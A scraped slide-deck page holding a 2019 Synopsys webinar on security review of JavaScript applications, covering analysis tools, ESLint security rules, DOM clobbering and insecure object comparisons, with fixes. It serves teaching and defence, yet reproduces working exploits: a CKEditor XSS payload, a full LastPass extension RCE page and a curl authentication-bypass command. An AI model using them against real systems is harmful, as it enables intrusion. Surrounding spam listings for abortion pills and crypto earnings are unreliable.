Dev ops on aws deep dive on continuous delivery - Toronto
 
DevOps On AWS - Deep Dive on Continuous Delivery
DevOps On AWS - Deep Dive on Continuous DeliveryDevOps On AWS - Deep Dive on Continuous Delivery
DevOps On AWS - Deep Dive on Continuous Delivery
 
DevOps Patterns to Enable Success in Microservices
DevOps Patterns to Enable Success in MicroservicesDevOps Patterns to Enable Success in Microservices
DevOps Patterns to Enable Success in Microservices
 

More from Synopsys Software Integrity Group

Webinar–Segen oder Fluch?
Webinar–Segen oder Fluch?Webinar–Segen oder Fluch?
Webinar–Segen oder Fluch?
Synopsys Software Integrity Group
 
Webinar–Best Practices for DevSecOps at Scale
Webinar–Best Practices for DevSecOps at ScaleWebinar–Best Practices for DevSecOps at Scale
Webinar–Best Practices for DevSecOps at Scale
Synopsys Software Integrity Group
 
Webinar–That is Not How This Works
Webinar–That is Not How This WorksWebinar–That is Not How This Works
Webinar–That is Not How This Works
Synopsys Software Integrity Group
 
Do Design Quality and Code Quality Matter in Merger and Acquisition Tech Due ...
Do Design Quality and Code Quality Matter in Merger and Acquisition Tech Due ...Do Design Quality and Code Quality Matter in Merger and Acquisition Tech Due ...
Do Design Quality and Code Quality Matter in Merger and Acquisition Tech Due ...
Synopsys Software Integrity Group
 
Webinar–Delivering a Next Generation Vulnerability Feed
Webinar–Delivering a Next Generation Vulnerability FeedWebinar–Delivering a Next Generation Vulnerability Feed
Webinar–Delivering a Next Generation Vulnerability Feed
Synopsys Software Integrity Group
 
Webinar–Financial Services Study Shows Why Investing in AppSec Matters
Webinar–Financial Services Study Shows Why Investing in AppSec MattersWebinar–Financial Services Study Shows Why Investing in AppSec Matters
Webinar–Financial Services Study Shows Why Investing in AppSec Matters
Synopsys Software Integrity Group
 
Webinar–Sécurité Applicative et DevSecOps dans un monde Agile
Webinar–Sécurité Applicative et DevSecOps dans un monde AgileWebinar–Sécurité Applicative et DevSecOps dans un monde Agile
Webinar–Sécurité Applicative et DevSecOps dans un monde Agile
Synopsys Software Integrity Group
 

More from Synopsys Software Integrity Group (20)

Webinar–Segen oder Fluch?
Webinar–Segen oder Fluch?Webinar–Segen oder Fluch?
Webinar–Segen oder Fluch?
 
Webinar–Mobile Application Hardening Protecting Business Critical Apps
Webinar–Mobile Application Hardening Protecting Business Critical AppsWebinar–Mobile Application Hardening Protecting Business Critical Apps
Webinar–Mobile Application Hardening Protecting Business Critical Apps
 
Webinar–The 2019 Open Source Year in Review
Webinar–The 2019 Open Source Year in ReviewWebinar–The 2019 Open Source Year in Review
Webinar–The 2019 Open Source Year in Review
 
Webinar–Best Practices for DevSecOps at Scale
Webinar–Best Practices for DevSecOps at ScaleWebinar–Best Practices for DevSecOps at Scale
Webinar–Best Practices for DevSecOps at Scale
 
Webinar–That is Not How This Works
Webinar–That is Not How This WorksWebinar–That is Not How This Works
Webinar–That is Not How This Works
 
Webinar–You've Got Your Open Source Audit Report–Now What?
Webinar–You've Got Your Open Source Audit Report–Now What? Webinar–You've Got Your Open Source Audit Report–Now What?
Webinar–You've Got Your Open Source Audit Report–Now What?
 
Webinar–The State of Open Source in M&A Transactions
Webinar–The State of Open Source in M&A Transactions Webinar–The State of Open Source in M&A Transactions
Webinar–The State of Open Source in M&A Transactions
 
Webinar–5 ways to risk rank your vulnerabilities
Webinar–5 ways to risk rank your vulnerabilitiesWebinar–5 ways to risk rank your vulnerabilities
Webinar–5 ways to risk rank your vulnerabilities
 
Do Design Quality and Code Quality Matter in Merger and Acquisition Tech Due ...
Do Design Quality and Code Quality Matter in Merger and Acquisition Tech Due ...Do Design Quality and Code Quality Matter in Merger and Acquisition Tech Due ...
Do Design Quality and Code Quality Matter in Merger and Acquisition Tech Due ...
 
Webinar–Using Evidence-Based Security
Webinar–Using Evidence-Based Security Webinar–Using Evidence-Based Security
Webinar–Using Evidence-Based Security
 
Webinar–Delivering a Next Generation Vulnerability Feed
Webinar–Delivering a Next Generation Vulnerability FeedWebinar–Delivering a Next Generation Vulnerability Feed
Webinar–Delivering a Next Generation Vulnerability Feed
 
Webinar–Financial Services Study Shows Why Investing in AppSec Matters
Webinar–Financial Services Study Shows Why Investing in AppSec MattersWebinar–Financial Services Study Shows Why Investing in AppSec Matters
Webinar–Financial Services Study Shows Why Investing in AppSec Matters
 
Webinar–What You Need To Know About Open Source Licensing
Webinar–What You Need To Know About Open Source LicensingWebinar–What You Need To Know About Open Source Licensing
Webinar–What You Need To Know About Open Source Licensing
 
Webinar–Improving Fuzz Testing of Infotainment Systems and Telematics Units U...
Webinar–Improving Fuzz Testing of Infotainment Systems and Telematics Units U...Webinar–Improving Fuzz Testing of Infotainment Systems and Telematics Units U...
Webinar–Improving Fuzz Testing of Infotainment Systems and Telematics Units U...
 
Webinar–Why All Open Source Scans Aren't Created Equal
Webinar–Why All Open Source Scans Aren't Created EqualWebinar–Why All Open Source Scans Aren't Created Equal
Webinar–Why All Open Source Scans Aren't Created Equal
 
Webinar–Is Your Software Security Supply Chain a Security Blind Spot?
Webinar–Is Your Software Security Supply Chain a Security Blind Spot?Webinar–Is Your Software Security Supply Chain a Security Blind Spot?
Webinar–Is Your Software Security Supply Chain a Security Blind Spot?
 
Webinar–Sécurité Applicative et DevSecOps dans un monde Agile
Webinar–Sécurité Applicative et DevSecOps dans un monde AgileWebinar–Sécurité Applicative et DevSecOps dans un monde Agile
Webinar–Sécurité Applicative et DevSecOps dans un monde Agile
 
Webinar – Streamling Your Tech Due Diligence Process for Software Assets
Webinar – Streamling Your Tech Due Diligence Process for Software AssetsWebinar – Streamling Your Tech Due Diligence Process for Software Assets
Webinar – Streamling Your Tech Due Diligence Process for Software Assets
 
Webinar – Security Tool Misconfiguration and Abuse
Webinar – Security Tool Misconfiguration and AbuseWebinar – Security Tool Misconfiguration and Abuse
Webinar – Security Tool Misconfiguration and Abuse
 
Webinar – Software Security 2019–Embrace Velocity
Webinar – Software Security 2019–Embrace Velocity Webinar – Software Security 2019–Embrace Velocity
Webinar – Software Security 2019–Embrace Velocity
 

Recently uploaded

AI & Machine Learning Presentation Template
AI & Machine Learning Presentation TemplateAI & Machine Learning Presentation Template
AI & Machine Learning Presentation Template
Presentation.STUDIO
 
Architecture decision records - How not to get lost in the past
Architecture decision records - How not to get lost in the pastArchitecture decision records - How not to get lost in the past
Architecture decision records - How not to get lost in the past
Papp Krisztián
 

Recently uploaded (20)

%in tembisa+277-882-255-28 abortion pills for sale in tembisa
%in tembisa+277-882-255-28 abortion pills for sale in tembisa%in tembisa+277-882-255-28 abortion pills for sale in tembisa
%in tembisa+277-882-255-28 abortion pills for sale in tembisa
 
OpenChain - The Ramifications of ISO/IEC 5230 and ISO/IEC 18974 for Legal Pro...
OpenChain - The Ramifications of ISO/IEC 5230 and ISO/IEC 18974 for Legal Pro...OpenChain - The Ramifications of ISO/IEC 5230 and ISO/IEC 18974 for Legal Pro...
OpenChain - The Ramifications of ISO/IEC 5230 and ISO/IEC 18974 for Legal Pro...
 
WSO2Con2024 - From Code To Cloud: Fast Track Your Cloud Native Journey with C...
WSO2Con2024 - From Code To Cloud: Fast Track Your Cloud Native Journey with C...WSO2Con2024 - From Code To Cloud: Fast Track Your Cloud Native Journey with C...
WSO2Con2024 - From Code To Cloud: Fast Track Your Cloud Native Journey with C...
 
WSO2Con2024 - Low-Code Integration Tooling
WSO2Con2024 - Low-Code Integration ToolingWSO2Con2024 - Low-Code Integration Tooling
WSO2Con2024 - Low-Code Integration Tooling
 
WSO2CON 2024 - WSO2's Digital Transformation Journey with Choreo: A Platforml...
WSO2CON 2024 - WSO2's Digital Transformation Journey with Choreo: A Platforml...WSO2CON 2024 - WSO2's Digital Transformation Journey with Choreo: A Platforml...
WSO2CON 2024 - WSO2's Digital Transformation Journey with Choreo: A Platforml...
 
WSO2Con2024 - Organization Management: The Revolution in B2B CIAM
WSO2Con2024 - Organization Management: The Revolution in B2B CIAMWSO2Con2024 - Organization Management: The Revolution in B2B CIAM
WSO2Con2024 - Organization Management: The Revolution in B2B CIAM
 
WSO2CON 2024 - Building the API First Enterprise – Running an API Program, fr...
WSO2CON 2024 - Building the API First Enterprise – Running an API Program, fr...WSO2CON 2024 - Building the API First Enterprise – Running an API Program, fr...
WSO2CON 2024 - Building the API First Enterprise – Running an API Program, fr...
 
WSO2CON 2024 - API Management Usage at La Poste and Its Impact on Business an...
WSO2CON 2024 - API Management Usage at La Poste and Its Impact on Business an...WSO2CON 2024 - API Management Usage at La Poste and Its Impact on Business an...
WSO2CON 2024 - API Management Usage at La Poste and Its Impact on Business an...
 
Crypto Cloud Review - How To Earn Up To $500 Per DAY Of Bitcoin 100% On AutoP...
Crypto Cloud Review - How To Earn Up To $500 Per DAY Of Bitcoin 100% On AutoP...Crypto Cloud Review - How To Earn Up To $500 Per DAY Of Bitcoin 100% On AutoP...
Crypto Cloud Review - How To Earn Up To $500 Per DAY Of Bitcoin 100% On AutoP...
 
WSO2CON 2024 - Architecting AI in the Enterprise: APIs and Applications
WSO2CON 2024 - Architecting AI in the Enterprise: APIs and ApplicationsWSO2CON 2024 - Architecting AI in the Enterprise: APIs and Applications
WSO2CON 2024 - Architecting AI in the Enterprise: APIs and Applications
 
AI & Machine Learning Presentation Template
AI & Machine Learning Presentation TemplateAI & Machine Learning Presentation Template
AI & Machine Learning Presentation Template
 
WSO2CON 2024 - Cloud Native Middleware: Domain-Driven Design, Cell-Based Arch...
WSO2CON 2024 - Cloud Native Middleware: Domain-Driven Design, Cell-Based Arch...WSO2CON 2024 - Cloud Native Middleware: Domain-Driven Design, Cell-Based Arch...
WSO2CON 2024 - Cloud Native Middleware: Domain-Driven Design, Cell-Based Arch...
 
WSO2CON 2024 - How CSI Piemonte Is Apifying the Public Administration
WSO2CON 2024 - How CSI Piemonte Is Apifying the Public AdministrationWSO2CON 2024 - How CSI Piemonte Is Apifying the Public Administration
WSO2CON 2024 - How CSI Piemonte Is Apifying the Public Administration
 
AzureNativeQumulo_HPC_Cloud_Native_Benchmarks.pdf
AzureNativeQumulo_HPC_Cloud_Native_Benchmarks.pdfAzureNativeQumulo_HPC_Cloud_Native_Benchmarks.pdf
AzureNativeQumulo_HPC_Cloud_Native_Benchmarks.pdf
 
WSO2Con2024 - Facilitating Broadband Switching Services for UK Telecoms Provi...
WSO2Con2024 - Facilitating Broadband Switching Services for UK Telecoms Provi...WSO2Con2024 - Facilitating Broadband Switching Services for UK Telecoms Provi...
WSO2Con2024 - Facilitating Broadband Switching Services for UK Telecoms Provi...
 
WSO2Con2024 - Navigating the Digital Landscape: Transforming Healthcare with ...
WSO2Con2024 - Navigating the Digital Landscape: Transforming Healthcare with ...WSO2Con2024 - Navigating the Digital Landscape: Transforming Healthcare with ...
WSO2Con2024 - Navigating the Digital Landscape: Transforming Healthcare with ...
 
WSO2Con2024 - Simplified Integration: Unveiling the Latest Features in WSO2 L...
WSO2Con2024 - Simplified Integration: Unveiling the Latest Features in WSO2 L...WSO2Con2024 - Simplified Integration: Unveiling the Latest Features in WSO2 L...
WSO2Con2024 - Simplified Integration: Unveiling the Latest Features in WSO2 L...
 
WSO2CON 2024 - Navigating API Complexity: REST, GraphQL, gRPC, Websocket, Web...
WSO2CON 2024 - Navigating API Complexity: REST, GraphQL, gRPC, Websocket, Web...WSO2CON 2024 - Navigating API Complexity: REST, GraphQL, gRPC, Websocket, Web...
WSO2CON 2024 - Navigating API Complexity: REST, GraphQL, gRPC, Websocket, Web...
 
Architecture decision records - How not to get lost in the past
Architecture decision records - How not to get lost in the pastArchitecture decision records - How not to get lost in the past
Architecture decision records - How not to get lost in the past
 
WSO2CON 2024 - Unlocking the Identity: Embracing CIAM 2.0 for a Competitive A...
WSO2CON 2024 - Unlocking the Identity: Embracing CIAM 2.0 for a Competitive A...WSO2CON 2024 - Unlocking the Identity: Embracing CIAM 2.0 for a Competitive A...
WSO2CON 2024 - Unlocking the Identity: Embracing CIAM 2.0 for a Competitive A...
 

Webinar–Reviewing Modern JavaScript Applications

  • 1. © 2019 Synopsys, Inc.1 Reviewing Modern JavaScript Applications Lewis Ardern, Senior Security Consultant, Synopsys Software Integrity Group April 29, 2019
  • 2. © 2019 Synopsys, Inc.2 About me Senior Security Consultant, Synopsys Software Integrity Group – Consultant at formerly Cigital Prior to Cigital • B.Sc. in computer security and ethical hacking – Founder of the Leeds Ethical Hacking Society • Software developer • Security consultant About Synopsys • Historically all about hardware • Software Integrity Group formed to tackle software • Team consisting of well-known organizations – Black Duck – Coverity – Codenomicon – Cigital – Codiscope twitter.com/LewisArdern Lewis Ardern Senior Consultant Software Integrity Group SIG Consulting
  • 3. © 2019 Synopsys, Inc.3 JavaScript landscape
  • 4. © 2019 Synopsys, Inc.4 JavaScript landscape • Runs everywhere: browsers, servers, mobile, IoT devices • Lots of frameworks, high levels of abstraction • Move toward safe-by-default frameworks Database MongoDB Server Node.js/Express.js Client Angular
  • 5. © 2019 Synopsys, Inc.5 Life as we know it “For the sixth year in a row, JavaScript is the most commonly used programming language.” —2018 Stack Overflow Developer Survey https://insights.stackoverflow.com/survey/2016
  • 6. © 2019 Synopsys, Inc.6 Let’s not be REACTive! • Frameworks can offer enormous security benefits at the expense of outpacing existing security tools • It is important to understand the specific security characteristics and guarantees of any framework you deploy • Framework features can sometimes be abused – http://blog.portswigger.net/2017/09/abusing-javascript- frameworks-to-bypass.html • Teams transition / adopt different frameworks in rapid succession
  • 7. © 2019 Synopsys, Inc.7 Modern JavaScript analysis Security professionals need to embrace developer tools to effectively identify security issues • Live in the browser console • Debug effectively • Weaponize developer tools to identify security issues • Commercial products (not covered today)
  • 8. © 2019 Synopsys, Inc.8 What today’s talk covers Real-life examples from domain-specific experts Recommended tools to use Lesser-known JavaScript bugs
  • 9. © 2019 Synopsys, Inc.9 Example 1 • One of the _known_ edge cases with React is that you can provide URI schemes such as `javascript:alert(0)` and get cross-site scripting via an `href` tag • In this HackerOne report, cross-site scripting led to remote code execution due to the steam:// URI used to interact with the steam client https://hackerone.com/reports/409850
  • 10. © 2019 Synopsys, Inc.10 Video @zemnmez cross-site scripting against https://steamcommunity.com
  • 11. © 2019 Synopsys, Inc.11 What did we see? Using the Chrome Developer Console • Beautifying the code • Searching for functions • Debugging client-side values • Overriding values on the fly inside the console • Backticks to bypass controls Knowledge of React pitfalls https://hackerone.com/reports/409850
  • 12. © 2019 Synopsys, Inc.12 Example 2 LiveOverflow’s pop-under RE • Anti-debugging • Various bypass techniques • Deobfuscating JavaScript • Debugging locally • Using proxies • Weird browser quirks https://www.youtube.com/watch?v=8UqHCrGdxOM
  • 13. © 2019 Synopsys, Inc.13 Example 3 Gareth Heyes’ AngularJS research • Deep understanding of JavaScript • Auditing framework code • DOM manipulation • Inspecting objects && prototype overriding https://portswigger.net/blog/dom-based-angularjs-sandbox-escapes https://portswigger.net/blog/xss-without-html-client-side-template-injection-with-angularjs
  • 14. © 2019 Synopsys, Inc.14 Products that perform JavaScript dataflow analysis: • Coverity Scan • LGTM Tools that look for areas of interest: • Tarnish • JSHint • JSLint • ESLint – Code Climate—nodesecurity plugin • TSLint – tslint-angular-security Tools that look for known issues in JavaScript libraries: • Retire.js • npm audit • yarn audit • GitHub • Snyk • auditjs Tools that deobfuscate JavaScript: • Closure Compiler • JStillery • unminify JavaScript analysis tools Referencing only projects that either are open source or scan open source
  • 15. © 2019 Synopsys, Inc.15 React https://chrome.google.com/webstore/detail/react-developer- tools/fmkadmapgofadopljbjfkapdkoienihi?hl=en AngularJS https://chrome.google.com/webstore/detail/angularjs- batarang/ighdmehidhipcmcojjgiloacoafjmpfk?hl=en Angular https://augury.rangle.io/ Vue https://github.com/vuejs/vue-devtools Framework analysis browser extensions Just because “production mode is set” doesn’t mean they can’t be used for live apps https://lh3.googleusercontent.com/GjX6Q3_FVJfc0DqE2wiPKkgOfth6otzV-D7GV- wB6sH5_t1oodMaHOBLsYOLeydb85bKWu6X=w640-h400-e365
  • 16. © 2019 Synopsys, Inc.16 Known issues in JavaScript libraries Always check for known security issues • GitHub automatically reports security issues • Depending on project type, use tools: Example Command npm npm audit yarn yarn audit bower auditjs --bower bower.json Client-side JavaScript retire --js /path/ Node.js open source snyk test
  • 17. © 2019 Synopsys, Inc.17 ESLint • ESLint is an open source pluggable linting utility for JavaScript • Linters parse ASTs to identify code quality and security issues • ESLint was created to allow developers to enforce rules • Can be hooked into the development release cycle – Many developers do not allow code to be pushed with ESLint issues flagged – You can create Git hooks – Can be part of CI/CD pipeline • Allows custom rules to enforce domain specific guidance
  • 18. © 2019 Synopsys, Inc.18 ESLint ESLint is now the go-to tool for JavaScript developers https://stateofjs.com/2017/other-tools/
  • 19. © 2019 Synopsys, Inc.19 ESLint security rules ESLint can help security consultants look for points of interest Default security rule configs • Node.js https://github.com/nodesecurity/eslint-config-nodesecurity • Vanilla JS https://github.com/mozfreddyb/eslint-config-scanjs • AngularJS https://github.com/LewisArdern/eslint-plugin-angularjs-security-rules • React https://github.com/yannickcr/eslint-plugin-react#list-of-supported-rules Security rules • eslint-plugin-scanjs • eslint-plugin-security • eslint-plugin-react • eslint-plugin-angularjs-security • eslint-plugin-no-wildcard-postmessage • eslint-plugin-no-unsafe-innerhtml • vue/no-v-html • eslint-plugin-prototype-pollution-security-rules
  • 20. © 2019 Synopsys, Inc.20 Problem: In AngularJS security assessments, I want to identify problem locations quickly Solution: Create ESLint rules to run on every assessment as a starting point: JavaScript analysis tools for AngularJS https://www.npmjs.com/package/eslint-plugin-angularjs-security-rules
  • 21. © 2019 Synopsys, Inc.21 Steps to create a rule 1. Create a test with true positive and false positive 2. Walk the JavaScript AST and identify your requirements 3. Create a rule from the AST output 4. Make sure the test passes
  • 22. © 2019 Synopsys, Inc.22 Creating a test
  • 23. © 2019 Synopsys, Inc.23 Identifying the requirements
  • 24. © 2019 Synopsys, Inc.24 Create the rule
  • 25. © 2019 Synopsys, Inc.25 Testing the rules https://blog.appsecco.com/static-analysis-of-client-side-javascript-for-pen-testers-and-bug-bounty-hunters-f1cb1a5d5288 https://github.com/bkimminich/juice-shop
  • 26. © 2019 Synopsys, Inc.26 Lesser-known security issues Let’s talk about lesser-known bugs!
  • 27. © 2019 Synopsys, Inc.27 DOM clobbering Due to DOM specifications, certain HTML attributes have the ability to create values in JavaScript http://jibbering.com/faq/names http://thespanner.co.uk/2013/05/16/dom-clobbering Attributes can be used to define JavaScript values • id • action • form – input – name This can lead to: • Cross-site scripting (XSS) • Remote code execution (RCE) in browser extensions
  • 28. © 2019 Synopsys, Inc.28 DOM clobbering <html> <head> </head> <body> <test id=“value" foooo=“value" action=“exists"><form> <div id=“valueExists" name=“exists"><form> <script> if (value.action !== undefined) { alert('Dom Clobbering’) } if (value.foooo !== undefined) { // Value does not exist } if (valueExists !== undefined) { alert('DOM Clobbering’) } if (valueExists.exists !== undefined) { // Value does not exist } </script> </body> </html>
  • 29. © 2019 Synopsys, Inc.29 DOM clobbering <html> <body> <form><input name="ownerDocument"></form> <script> console.log(document.forms[0].ownerDocument) // Should return window.document // Returns <input name="ownerDocument"> </script> </body> </html>
  • 30. © 2019 Synopsys, Inc.30 DOM clobbering // Exploit Code From Mario’ talk https://www.slideshare.net/x00mario/in-the-dom-no-one-will-hear-you-scream#34 // Exploit <a href="plugins/preview/preview.html#<svg onload=alert(1)>" id="_cke_htmlToLoad" target="_blank">Click me for dolphins!</a> // Vulnerable Code <script> var doc = document; doc.open(); doc.write(window.opener._cke_htmlToLoad); doc.close; delete window.opener._cke_htmlToLoad </script> Exploit that achieved cross-site scripting in CKEditor https://www.slideshare.net/x00mario/in-the-dom-no-one-will-hear-you-scream#34
  • 31. © 2019 Synopsys, Inc.31 Demo DOM clobbering
  • 32. © 2019 Synopsys, Inc.32 DOM clobbering function lp_url_is_lastpass(e) { if (null == e) return !1; var t = /^https://([a-z0-9-]+.)?lastpass.(eu|com)//i , n = "https://lastpass.com/"; if ("undefined" != typeof base_url && (n = base_url), 0 == e.indexOf(n) || 0 == e.indexOf("https://lastpass.com/") || 0 == e.indexOf("https://lastpass.eu/")) return !0; if ("undefined" != typeof g_loosebasematching) { var i = lp_gettld_url(e); return new RegExp(i + "/$").test(base_url) } return t.test(e) } ... "openattach" == t.eventtype.value ? sendBG({ cmd: "openattach", attachkey: t.eventdata1.value, data: t.eventdata2.value, mimetype: t.eventdata3.value ... Exploit that achieved remote code execution in LastPass Chrome extension https://bugs.chromium.org/p/project-zero/issues/detail?id=1225&desc=6 Can be set with: x = document.createElement("a"); x.setAttribute("id", "base_url"); Can be set defined with <value id="g_loosebasematching" /> Used to send Remote Procedure Calls (RPC) leading to RCE
  • 33. © 2019 Synopsys, Inc.33 DOM clobbering <html> <head> <script> function start() { x = document.createElement("a"); x.setAttribute("id", "base_url"); x.setAttribute("href", "//" + document.location.hostname); document.body.appendChild(x); exploit.submit(); } </script> </head> <body onload="start()"> <exploit id="g_loosebasematching" /> <form id="exploit" name="lpwebsiteeventform"> <input type="hidden" name="eventtype" value="openattach"> <input type="hidden" name="eventdata1" value="d44479a4ce97554c24399f651ca76899179dec81c854b38ef2389c3185ae8eec"> <input type="hidden" name="eventdata2" value="!8uK7g5j8Eq08Nr86mhmMxw==|1dSN0jXZSQ51V1ww9rk4DQ=="> <input type="hidden" name="eventdata3" value="other:./../../../../../Desktop/exploit.bat"> <form> </body> </html> Exploit that achieved remote code execution in LastPass Chrome extension https://bugs.chromium.org/p/project-zero/issues/detail?id=1225&desc=6
  • 34. © 2019 Synopsys, Inc.34 DOM clobbering https://bugs.chromium.org/p/project-zero/issues/attachment?aid=277766&signed_aid=cHmKiER3b1GkZKd_e_0PAA==&inline=1
  • 35. © 2019 Synopsys, Inc.35 Insecure object comparisons Similar to DOM clobbering, there are many other ways insecure comparisons can happen const SESSIONS = {} const mustBeAuthenticated = (req, res, next) => { if(req.cookies) { const token = req.cookies.token if(token && SESSIONS[token]) { //allow it next() } } res.send('not authorized!') }
  • 36. © 2019 Synopsys, Inc.36 Comparison table Value Return SESSIONS['invalidString'] False SESSIONS[''] False SESSIONS['constructor'] True SESSIONS['hasOwnPropery'] True
  • 37. © 2019 Synopsys, Inc.37 What happens when you create an object in JavaScript? const test = {} __proto__: constructor: ƒ Object() hasOwnProperty: ƒ hasOwnProperty() isPrototypeOf: ƒ isProrotypeOf() [...] test['constructor'] === test.constructor //returns true
  • 38. © 2019 Synopsys, Inc.38 Exploit • This issue is trivial to exploit • Using curl, we can simply run the following command: – curl https://localhost:9000 -H "Cookie: token=constructor" • Alternatively, we can just set the document.cookie value via the browser
  • 39. © 2019 Synopsys, Inc.39 Demo Insecure object comparisons
  • 40. © 2019 Synopsys, Inc.40 SESSIONS.has('__proto__'); // false SESSIONS.has('validString'); // true How do we correctly check? Or you can use a Map instead of an Object SESSIONS.hasOwnProperty['__proto__'] // false SESSIONS.hasOwnProperty['validString'] // true
  • 41. © 2019 Synopsys, Inc.41 Note on authentication • Use a well-tested library like Passport to do authentication –http://www.passportjs.org/ • If rolling your own, use crypto.timingSafeEqual(a, b) –It provides a safe comparison –Also prevents timing attacks!
  • 42. © 2019 Synopsys, Inc.42 Other issues Prototype pollution • https://www.youtube.com/watch?v=LUsiFV3dsK8 • https://github.com/HoLyVieR/prototype-pollution-nsec18 • https://www.slideshare.net/LewisArdern/dangerous-design-patterns-in-one-line • https://github.com/LewisArdern/eslint-plugin-prototype-pollution-security-rules • https://gist.github.com/LewisArdern/db02e6c37b69c7cb4f1059dc9e536923 Mass assignment • https://talks.amanvir.io/forward-js-san-francisco-security-issues-in-modern-javascript-Jan- 2019.pdf • https://www.owasp.org/index.php/Mass_Assignment_Cheat_Sheet • https://www.npmjs.com/package/mongoose-mass-assign
  • 43. © 2019 Synopsys, Inc.43 Summary • Adopt and embrace developer tools to identify security issues • Conduct regular code reviews • Measure and track your code quality and security • Automate the process: – ESLint for code linting and npm audit for dependencies – Various static analysis tools for quality and security – Break your CI build if any issues get flagged
  • 44. Thank You Questions? Email: lewis@ardern.io Website: https://ardern.io Twitter: https://twitter.com/LewisArdern GitHub: https://github.com/LewisArdern LinkedIn: https://www.linkedin.com/in/lewis-ardern-83373a40